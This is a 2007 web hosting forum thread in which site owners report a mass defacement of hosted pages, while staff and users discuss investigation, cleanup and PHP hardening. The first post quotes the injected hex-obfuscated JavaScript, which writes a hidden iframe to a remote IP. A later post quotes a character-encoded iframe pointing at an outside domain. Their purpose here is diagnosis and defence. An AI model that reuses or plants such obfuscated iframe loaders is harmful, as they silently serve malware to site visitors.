Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)  (Read 21761 times)

Offline kakdela

  • Intergalactic Cowboy
  • *****
  • Posts: 68
    • http://www.adservices.net
VERY IMPORTANT: PLEASE CHECK YOUR WEBSITES FOR DEFACEMENT BY HACKERS.

I host MANY websites with LP. Yesterday (8/27/2007) and this morning (8/28/2007) I had started receiving customer complaints that when they went to their sites, their anti-virus software alerted them that their sites were Trojan infected and many were blocked from seeing their sites. I would say that at least 20 or 30 of my clients are affected, all spread out on different LP servers (and yes, all sites have DIFFERENT FTP logins and passwords). There's nothing common among the sites - most of the sites are simple HTML pages - not scripts like forums, cms, or anything that would indicate a common pattern.

So, I went to investigate, and sure enough - all files names index.html or index.php, default.html or .php, home.html or .php (and in some cases login.php) have the following inserted in their body tags (or in case of php script, this was inserted on the bottom of the script). Not just the main directory, but all subdirectories that have index files have been affected as well. All files appear to be dated yesterday or today.

Here's how this defacing looks like:

Code: [Select]
function v46d362555ac36(v46d362555b403){  return(parseInt(v46d362555b403,16));}function v46d362555cb88(v46d362555d354){  var v46d362555db26='';for(v46d362555e59a=0; v46d362555e59a<v46d362555d354.length; v46d362555e59a+=2){ v46d362555db26+=(String.fromCharCode(v46d362555ac36(v46d362555d354.substr(v46d362555e59a, 2))));}return v46d362555db26;} document.write(v46d362555cb88('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6231207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3931313534292B2766375C272077696474683D333833206865696768743D323338207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
So far, I have noticed the defacing on the following servers where SOME of my sites are hosted.

viola
atlas
stellar
sabik
danzig
savartos
hathor
prospero
naos
helium
mirach
galatea
centaur
angular
valkanos
omicron
aquarius

and counting... (I am discovering more and more as I try to fix my websites today and also change all FTP passwords - WHAT A PAIN!):

« Last Edit: July 13, 2008, 05:38:14 PM by Priest »

Offline Mitch

  • Berserker Poster
  • *****
  • Posts: 12625
    • MitchKeeler.com
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #1 on: August 29, 2007, 10:11:13 AM »
Hello, I apologize for any inconvenience this might have caused you.  This is something we are currently investigating.  System admins are on the case.  If you have not already done so - please put in a help desk ticket to support@lunarpages.com with examples, links, and servers and we will get this taken care of as soon as we can.  Thanks.
New to Web Site Hosting? Check Out the Lunarpages Blog Hosting Guide!


Follow us @lunarpages on Twitter!
Important Threads: Read This Before Posting! | Lunarforums Rules! | Mitch's Link of the Day!
Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !

Need Web Hosting Help? Check out the Lunarpages Web Hosting Wiki. It has tons of tips, tutorials and resources!

leighsww

  • Guest
Here's another thread regarding the issue --> Click here

A Mod may want to join the threads  :bigwink: * Edited - On second thought, maybe just leave this one, cuz the other thread has too many of my posts cluttering it up  haha
« Last Edit: August 29, 2007, 10:15:55 AM by leighsww »

Offline kakdela

  • Intergalactic Cowboy
  • *****
  • Posts: 68
    • http://www.adservices.net
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #3 on: August 29, 2007, 10:49:30 AM »
It's pretty scary - the ease with which these hackers were able to deface so many LP websites at once and on so many different servers. It seems that they went in from inside out - not logged in to each individual site via FTP, but broke into whole servers and defaced sites en mass. What also bothers me is that they were allowed to do this over two days - yesterday and today.

LP, what is the status on getting this resolved? What measures can be taken to make sure such blatant mass defacing doesn't happen again? It doesn't appear to be the matter of changing individual FTP passwords (even though I am doing my part by changing them) - rather, it's a LP-wide security issue. I've spent about three hours today going site by site and removing the inserted Trojan code from my customers' web sites, and I still have more to go.
« Last Edit: August 29, 2007, 10:51:14 AM by kakdela »

Offline Mitch

  • Berserker Poster
  • *****
  • Posts: 12625
    • MitchKeeler.com
Here's another thread regarding the issue --> Click here

A Mod may want to join the threads  :bigwink: * Edited - On second thought, maybe just leave this one, cuz the other thread has too many of my posts cluttering it up  haha

Ok, I'll just go ahead and re-direct everybody to this thread here.  :thumb:  Right now not all details are known, and anything said would be just pure speculation.  As soon as I get word from the system admins investigating the issue I will let you know here.  Thanks!
New to Web Site Hosting? Check Out the Lunarpages Blog Hosting Guide!


Follow us @lunarpages on Twitter!
Important Threads: Read This Before Posting! | Lunarforums Rules! | Mitch's Link of the Day!
Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !

Need Web Hosting Help? Check out the Lunarpages Web Hosting Wiki. It has tons of tips, tutorials and resources!

leighsww

  • Guest
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #5 on: August 29, 2007, 11:14:11 AM »
bluejohn's post in the other thread --> Click here

... shows some interesting data. It displays an IP address of 58.65.235.153. That IP is originating out of Hong Kong.

Now whether that's the Hacker's IP address or an IP that they are just having the defacements redirected to, I don't know  :? but maybe the techy geeks can figure out what is going on with that bit of code that bluejohn deciphered.


Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • *****
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #6 on: August 29, 2007, 06:41:43 PM »
I can assure you, as a SMF Team member myself, there is no known security holes in SMF.
I ran a recursive check though all my files and luckily I don't have this in any of my files with a fancy php script I made today :P
So I can say that this is actually more random than a single problem so far, As I run hundreds of php scripts, though with most being hand coded scripts.

Offline aiko

  • Spaceship Captain
  • *****
  • Posts: 122
One of my sites got hacked - Please help
« Reply #7 on: August 29, 2007, 11:40:08 PM »
Hi everyone,

One of my sites got hacked. The main page index.php shows a script at the footer...

Header invalid injected code is

Code: [Select]
iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112"
File index.php permission is 644

Looking for clues...
Do u have any idea where to start?
Any advice...

Thanks in advance, aiko
« Last Edit: July 13, 2008, 05:39:15 PM by Priest »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: One of my sites got hacked - Please help
« Reply #8 on: August 30, 2007, 12:29:03 AM »
There's a step-by-step at http://25yearsofprogramming.com/blog/20070705.htm that will get you started.

When you get your site logs, look for entries that look like index.php?inc=http://badsite.com/includefile.ext

If your logs appear to be empty, try the cpanel > Raw Access Logs icon instead of Raw Log Manager. (It's right next to it.)

aiko, the <iframe> code you posted is encoded as numeric character references or NCR. Converted to ascii, it's an iframe with its content served from hxxp://watch77.com/tds/xds/iframe.php.
« Last Edit: August 30, 2007, 09:10:55 AM by SteveW »

Offline kakdela

  • Intergalactic Cowboy
  • *****
  • Posts: 68
    • http://www.adservices.net
Question for LP admins re: recent site defacements
« Reply #9 on: August 30, 2007, 07:42:18 AM »
Has there been any progress on finding out how the hackers were able to break into so many LP servers during last two days? I have had over 15 sites broken into on probably as many servers, but I am yet to get any notice from LP regarding this. I believe that they are thousands of sites at LP that may have had their homepages defaced with a Trojan (or a hidden link to one), but siteowners don't even know it (YET!).

What preventative measures have been implemented since this happened?

I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

Thanks.

Offline Mitch

  • Berserker Poster
  • *****
  • Posts: 12625
    • MitchKeeler.com
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #10 on: August 30, 2007, 07:56:18 AM »
Hello, I have just merged some of the more recent topics created about this so that we can keep the conversation about it in one place.  This way neither our clients on the forums here nor our support staff have to go hunting around to make sure everybody was replied to.  (Trying to make tracking this a little easier for all  :smiling:)

Server admins are currently still investigating the situation at this time.  If we get any other word on the issue we will be sure to let you know as soon as we can.  Thank you for your understanding and patience as they look into things. 
New to Web Site Hosting? Check Out the Lunarpages Blog Hosting Guide!


Follow us @lunarpages on Twitter!
Important Threads: Read This Before Posting! | Lunarforums Rules! | Mitch's Link of the Day!
Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !

Need Web Hosting Help? Check out the Lunarpages Web Hosting Wiki. It has tons of tips, tutorials and resources!

Lupine1647

  • Guest
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #11 on: August 30, 2007, 07:57:38 AM »
Currently the situation is being investigated by our administrators. If your index page is overwritten, we can perform a restore for you from our backups. Just send a note to support.

I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

How would this be done exactly? Every situation that I could come up with results in more false positives that useful results.

Offline farreachfarm

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #12 on: August 30, 2007, 10:41:03 AM »
This is the SECOND TIME this month!

Watch77 -- Spotted this on 8/29 as well -- This seems to also affect .ASPXs as well.  Not only does watch77.com show up, but so does onlinehomebanking.com.

Invision Power Board -- Futhermore... back on 8/18, my index.aspx was replaced to point to Invision Power Board.  Worst yet, the hack removed the log file for that day.

I was told that it's because I had scripts.  My home page is currently nothing but a placeholder, no embedded scripts.  I did have media wiki but that's behind a password protected folder.  I've since deleted it, and still got hacked again.

Oh... I was told that restores cost $75.

--Scott

Offline kakdela

  • Intergalactic Cowboy
  • *****
  • Posts: 68
    • http://www.adservices.net
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #13 on: August 30, 2007, 10:45:23 AM »
First of all, it's not just one page, it's MANY websites and every index.php, default.php, home.php, login.php or .html or .htm has been altered. And the defacement happened not just in the main directories of websites, but also in nearly every subdirectory as well. So, it's many, many websites and pages.

The alert system that I had in mind may not necessarily send a notice to website owner automatically by the system, but would be sent by LP admin. I am assuming that LP knew that there was an issue with websites being defaced, just because of the sheer number of affected accounts. But, no e-mail was sent to anyone informing them of a problem (at least not to me, and I host a lot of sites.)

It would have been nice to have been notified by LP of the system wide attack, at least manually (not automatically) - and not hear it from site visitors and customers, or look through nearly 40 sites we host with LP and check and fix every single directory and subdirectory on every single site we own. LP routinely runs scripts to weed out outdated scripts - the same thing could have been done in this particular case, where the same Javascript code was inserted en mass.
« Last Edit: August 30, 2007, 11:43:28 AM by kakdela »

Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • *****
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #14 on: August 30, 2007, 12:30:31 PM »
If this is a RFI (Remote File Inclusion)

I really suggest setting up a custom php.ini with these values
Code: [Select]
register_globals = Off
allow_url_fopen = Off
display_errors = Off
log_errors = On
expose_php = Off

This will disable register globals which is the cause of most problems in php, disable fopen to use urls, hide any errors (So when a error occurs the full path in your site isn't revealed) and instead will log them. The last one is optional, but this just tells php to not send any header information about the php on the server. Makes it harder for crawlers to know if you are really using php or not.

for ASP users I don't got much info. I don't use ASP.

I am sure lunarpages is now scanning for this on all clients site hopefully. But a simple php script to search all files in your home folder works just as well.